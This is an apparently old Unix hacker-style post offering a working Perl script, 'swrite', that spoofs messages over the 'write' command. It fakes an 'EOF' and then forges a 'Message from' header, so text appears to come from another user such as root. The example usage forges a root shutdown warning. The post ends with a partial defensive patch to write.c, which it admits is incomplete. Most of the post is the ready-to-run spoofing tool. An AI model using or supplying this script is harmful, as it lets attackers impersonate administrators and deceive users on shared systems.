It is trivial to spoof a write from one user to the next locally
on a system by faking an "EOF". This ofcourse does not effect
users who have turned off their write permissions. It's also
fairly noticeable by the lack of any beep.
-------------------------------swrite-----------------------------------------
#!/usr/contrib/bin/perl
# (NO C) intellectual property is theft... butafuco@mc.net
if(@ARGV < 2) {
print "\n Usage: swrite target from [tty]\n";
exit 0;
}
while (<STDIN>){
chop($line = $_);
push @to_write, $line;
}
$oopsmessage = "oops... sorry :\)\n";
$wait = 30;
$delay = 2;
chop($host = `hostname`);
$terminal = "console";
if(@ARGV > 2){
$terminal = $ARGV[2];
}
open(JIM, "|write $ARGV[0]");
select(JIM);
$| =1;
sleep $delay;
print(JIM $oopsmessage);
print(JIM "EOF\n");
sleep $wait;
chop($time = `date +%H:%M`);
print(JIM "\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n");
foreach $line (@to_write){
sleep $delay;
print (JIM "$line\n");
}
$| = 0;
close(JIM);
-------------------------------swrite----------------------------------------
example usage...
Un*x % echo The System is going down IMMIDIATELY\! | ./swrite \
user root console
If your an absolute paranoid, here are the diff's of an incomplete
patch for write.c.. it's a start anyhow.
281c281,284
< while (fgets(line, sizeof(line), stdin) != NULL)
---
> while (fgets(line, sizeof(line), stdin) != NULL){
> if(!strcmp(line, "EOF\n")){
> (void)strcpy(line, "EOF <-- Warning: Not End of File.\n");
> }
282a286
> }
It'll work for "EOF" just not for "EOF " or "EOF " etc...